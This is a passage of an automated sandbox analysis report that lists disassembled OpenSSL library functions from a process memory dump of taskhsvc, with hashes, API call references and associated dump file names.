                                                            • API String ID: 0-1740075221
                                                            • Opcode ID: 2e544835028306fde355e452f012fd1108cb4f53da23d7d187d6514219e7eba7
                                                            • Instruction ID: f199dd454de9dbfdeb5e2895ac7d035ffb30222b6ea0ed090eb6ae346eafba2f
                                                            • Opcode Fuzzy Hash: 2e544835028306fde355e452f012fd1108cb4f53da23d7d187d6514219e7eba7
                                                            • Instruction Fuzzy Hash: B0411B756197009FDB10EF79C580B5BBBF1AB89318F22891CE9A4CB740D735E906CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF70850 Relevance: 21.1, APIs: 14, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2iN1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1934435860-0
                                                            • Opcode ID: 7832ef4c20b7d060f52d4b88ac18e45766c5eff0be748f8a7fa7f349d4bd7620
                                                            • Instruction ID: 1cbfa64d68f6bfa6719a5dc8b5c4fb8a87cc965ac2c4cb6ecfbcef8e4ba2f2bc
                                                            • Opcode Fuzzy Hash: 7832ef4c20b7d060f52d4b88ac18e45766c5eff0be748f8a7fa7f349d4bd7620
                                                            • Instruction Fuzzy Hash: C641D1716197409FCB50EF79D280A4FBBF0AB89318F46991CE5A4CBB00D331E9098F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF745C0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_checkX509_cmp_timetime
                                                            • String ID:
                                                            • API String ID: 911605100-0
                                                            • Opcode ID: 4d8a15a04f8cb8aa4390c751c77f7238d5732f8b7896b181f2363524c5e2b2f7
                                                            • Instruction ID: 40d3ffa1812f4d817c301fb0809d1767782be91acdeac5c6351d33713a829726
                                                            • Opcode Fuzzy Hash: 4d8a15a04f8cb8aa4390c751c77f7238d5732f8b7896b181f2363524c5e2b2f7
                                                            • Instruction Fuzzy Hash: 1A31F3B250D301DBE300DF65D98464BBFF4AF85398F02891EE8988B750D7B8E5498F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6AC10 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PKCS7_new.LIBEAY32 ref: 6CF6AC24
                                                              • Part of subcall function 6CF63470: ASN1_item_new.LIBEAY32 ref: 6CF63485
                                                            • OBJ_nid2obj.LIBEAY32 ref: 6CF6AC36
                                                            • ASN1_STRING_type_new.LIBEAY32 ref: 6CF6AC45
                                                              • Part of subcall function 6CF23F30: CRYPTO_malloc.LIBEAY32 ref: 6CF23F5A
                                                            • PKCS12_SAFEBAGS_it.LIBEAY32 ref: 6CF6AC51
                                                            • ASN1_item_pack.LIBEAY32 ref: 6CF6AC64
                                                              • Part of subcall function 6CF26B40: CRYPTO_free.LIBEAY32 ref: 6CF26B72
                                                              • Part of subcall function 6CF26B40: ASN1_item_i2d.LIBEAY32 ref: 6CF26B8C
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6ACB7
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6ACE7
                                                            • PKCS7_free.LIBEAY32 ref: 6CF6ACEF
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6AD22
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF6AD29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$G_type_newJ_nid2objN1_item_i2dN1_item_newN1_item_packO_freeO_mallocS12_S7_freeS7_newS_it__stack_chk_fail
                                                            • String ID: d$r
                                                            • API String ID: 2932449127-4286335832
                                                            • Opcode ID: 21823948ba1bd5813a3b3cb82facde60486af2e0f4e79024c2a75e0ffad81c8e
                                                            • Instruction ID: 0ea3ddca75c0deacc56e60bc54b2f2d353389c7c55c2d31b8419af4df2c775fa
                                                            • Opcode Fuzzy Hash: 21823948ba1bd5813a3b3cb82facde60486af2e0f4e79024c2a75e0ffad81c8e
                                                            • Instruction Fuzzy Hash: 4121EEB18193419FE700AF66C54434BBBF0BF85348F12881CE9D88BB51D7B9D649CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF70530 Relevance: 19.6, APIs: 13, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2i__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 314559513-0
                                                            • Opcode ID: 994c239d67836c9380f11d9d7f3146c9466809af7a250dfd3857666f8a2fb3cc
                                                            • Instruction ID: 6ae7ce26f07d31abedd460c429790288154c3e8f2609144b423f282228f5d3c1
                                                            • Opcode Fuzzy Hash: 994c239d67836c9380f11d9d7f3146c9466809af7a250dfd3857666f8a2fb3cc
                                                            • Instruction Fuzzy Hash: 2E4107759097419FCB40EF39C68164BBBF1BB89318F86991CE5A48B700E331E9098F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE9E5B0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: &$j
                                                            • API String ID: 4216919130-2668530336
                                                            • Opcode ID: e523267f4268e4f72f0ceb8e6f670eab2c4c5e7e78684602baf3e47bf34515f3
                                                            • Instruction ID: 26031489083addd80602bc5ea84d23ca3b0cfec79f6a580d7377651f13b89a1a
                                                            • Opcode Fuzzy Hash: e523267f4268e4f72f0ceb8e6f670eab2c4c5e7e78684602baf3e47bf34515f3
                                                            • Instruction Fuzzy Hash: 284115B0614B018FEB00DF69C58471BBBF4BB45308F26891CEA949B741D775E845CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE98880 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BIO_s_file.LIBEAY32 ref: 6CE9889E
                                                            • BIO_new.LIBEAY32 ref: 6CE988A6
                                                              • Part of subcall function 6CEC4560: CRYPTO_malloc.LIBEAY32 ref: 6CEC458C
                                                            • ERR_put_error.LIBEAY32 ref: 6CE98967
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocO_newO_s_fileR_put_error
                                                            • String ID: $k
                                                            • API String ID: 3557565517-3968124548
                                                            • Opcode ID: 2af53656dcda9c05491a4b4602f456705fb027428669895688a116c0d1c7af70
                                                            • Instruction ID: 53ca84383f69e175bd724fbfc327d267f929c1915826f53817a9d9734b182a0e
                                                            • Opcode Fuzzy Hash: 2af53656dcda9c05491a4b4602f456705fb027428669895688a116c0d1c7af70
                                                            • Instruction Fuzzy Hash: 963128725087009BDB10DF31C64464BBBF4BB89358F12891DEAA4AB700D375E90A8BD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF0C5B0 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BIO_puts.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C5D9
                                                            • i2a_ASN1_OBJECT.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C5EF
                                                              • Part of subcall function 6CEF8B00: OBJ_obj2txt.LIBEAY32 ref: 6CEF8B49
                                                              • Part of subcall function 6CEF8B00: BIO_write.LIBEAY32 ref: 6CEF8B70
                                                            • OBJ_obj2nid.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C601
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • BIO_write.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF0C694
                                                            • BIO_indent.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF0C6B0
                                                            • BIO_printf.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF0C6F7
                                                            • BIO_write.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF0C713
                                                            • OBJ_find_sigid_algs.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C743
                                                            • EVP_PKEY_asn1_find.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C75F
                                                            • BIO_puts.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C7AB
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
